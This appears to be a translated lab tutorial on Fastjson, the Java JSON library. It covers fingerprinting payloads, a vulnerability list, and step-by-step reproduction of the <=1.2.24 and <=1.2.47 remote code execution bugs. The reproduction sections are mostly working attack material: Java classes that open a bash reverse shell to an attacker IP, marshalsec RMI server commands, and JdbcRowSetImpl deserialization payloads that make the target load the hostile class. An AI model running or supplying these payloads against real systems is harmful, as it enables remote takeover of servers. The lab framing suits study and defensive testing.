1. Overview of Fastjson
1. Introduction to fastjson
Fastjson is Alibaba's open-source JSON parsing library, which can parse JSON-formatted strings, support serialization of Java Beans into JSON strings, and deserialization from JSON strings to JavaBeans. It has the characteristics of high execution efficiency and wide range of applications.
advantage:
- FastJson is fast, regardless of serialization and deserialization, it is well-deserved fast
- Powerful (support common JDK classes including any Java Bean Class, Collection, Map, Date or enum)
- Zero dependencies (no dependencies on any other class library)
2. Vulnerability overview
- Fastjson<1.2.24 remote code execution (CNVD-2017-02833)
- Fastjson<=1.2.47 Remote Code Execution Vulnerability (CNVD-2019-22238)
- Fstjson < 1.2.60 remote denial of service vulnerability
- Fastjson <=1.2.68 deserialization remote code execution vulnerability
3. fastjson fingerprint recognition
-
Add key-value pairs to json. If there is no error in the response, it means that fastJSON may be used, because the key-value pairs of jackson can only be less or more. If there are more, more or less errors will be reported.
-
Detect whether the backend uses fastjson through DNS echo. (Not necessarily effective, you can only type blindly if you don’t know whether it is fastjson, or don’t know its specific version)
{
"@type":"java.net.Inet4Address", "val":"dnslog"}
{
"@type":"java.net.Inet6Address", "val":"dnslog"}
{
"@type":"java.net.InetSocketAddress"{
"address":, "val":"dnslog"}}
{
"@type":"com.alibaba.fastjson.JSONObject", {
"@type": "java.net.URL", "val":"dnslog"}}""}
{
{
"@type":"java.net.URL", "val":"dnslog"}:"aaa"}
Set[{
"@type":"java.net.URL", "val":"dnslog"}]
Set[{
"@type":"java.net.URL", "val":"dnslog"}
{
{
"@type":"java.net.URL", "val":"dnslog"}:0}
Two, Fastjson<1.2.24 remote code execution
1. Vulnerability overview
Introduction to the principle of the vulnerability: In the process of parsing json, fastjson supports the use of autoType to instantiate a specific class, and calls the set/get method of the class to access properties. By looking for related methods in the code, some malicious exploit chains can be constructed.
Affected version: fastjson <=1.2.24
Vulnerability analysis: https://xz.aliyun.com/t/8979
2. Vulnerability recurrence
-
Access the vulnerability environment: http://your_ip:8090, a json data is returned successfully, indicating that the vulnerability environment is successfully built.
-
Create a java file: shell.java with the following content:
import java.lang.Runtime; import java.lang.Process; public class TouchFile { static { try { Runtime rt = Runtime.getRuntime(); String[] commands = { "bash", "-i",">&","/dev/tcp/192.168.17.132/7777","0>&1"}; Process pc = rt.exec(commands); pc.waitFor() } catch (Exception e) { // do nothing } } }
-
Execute the compilation command to get the shell.class; and use python to open the temporary http file service, which listens to port 8080 by default.
Compile command:
javac shell.java
Open the file service command:
python -m SimpleHTTPServer 8080
-
Then we use the marshalsec project to start an RMI server, listen to port 9999, and formulate to load the remote class shell.class
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.17.132:8080/#shell" 9999
-
Use burp to capture packets on the vulnerability page and send the following POST data:
Content-Type: application/json { "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://192.168.17.132:9999/shell", "autoCommit":true } }
-
Successfully rebound the shell.
3. Fastjson<=1.2.47 remote code execution
1. Vulnerability overview
In June 2019, fastjson was exposed in the version of fastjson<=1.2.47. Attackers can use specially constructed json strings to bypass whitelist detection and successfully execute arbitrary commands.
Basic principle: checkAutoType
blacklist can be bypassed
Scope of influence: Fastjson<=1.2.47
Vulnerability analysis: https://www.sohu.com/a/438893775_750628
2. Vulnerability recurrence
-
As usual, access the vulnerability environment, use burpsuite to grab a package, add something to check whether it is fastjson, as follows, use json data to add a key-value pair, use POST to send, and return normally, indicating that it is fastjson.
-
Start to reproduce directly, first construct a malicious java class, execute the command
javac shell.java
to compile it into a class class.import java.lang.Runtime; import java.lang.Process; public class shell { static { try { Runtime rt = Runtime.getRuntime(); String[] commands = { "/bin/bash","-c","bash -i >& /dev/tcp/x.x.x.x/port 0>&1"}; Process pc = rt.exec(commands); pc.waitFor(); } catch (Exception e) { } } }
-
Enable http file server and ldap server.
Start http file server:
python -m SimpleHTTPServer 8080
Start the ldap server:
ava -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.17.132:8080/#shell" 9999
-
Send poc, poc is as follows: (remember to change content-type)
{ "a":{ "@type":"java.lang.Class", "val":"com.sun.rowset.JdbcRowSetImpl" }, "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://x.x.x.x:9999/shell", "autoCommit":true } }
-
Successful getshell.
Four, Fastjson <=1.2.68 deserialization remote code execution
1. Vulnerability overview
Vulnerability profile:
This new vulnerability can still bypass the restricted deserialization when autotype is turned off in versions 1.2.68 and earlier. Compared with the vulnerability in version 1.2.47, this version still has some restrictions. For example, 1.2.47 is The restrictions of the blacklist can be bypassed, but this vulnerability cannot bypass the blacklist, and requires the class to implement the AutoCloseable interface. At present, the main JNDI gadgets have entered the blacklist, and the deserialization class is not allowed to implement the ClassLoader, DataSource, and RowSet interfaces, which makes most of the JNDI gadgets unusable.
Scope of influence: Fastjson <=1.2.68, fastjson sec version < sec10
Vulnerability analysis: https://www.anquanke.com/post/id/208104
2. Vulnerability recurrence
pending upgrade…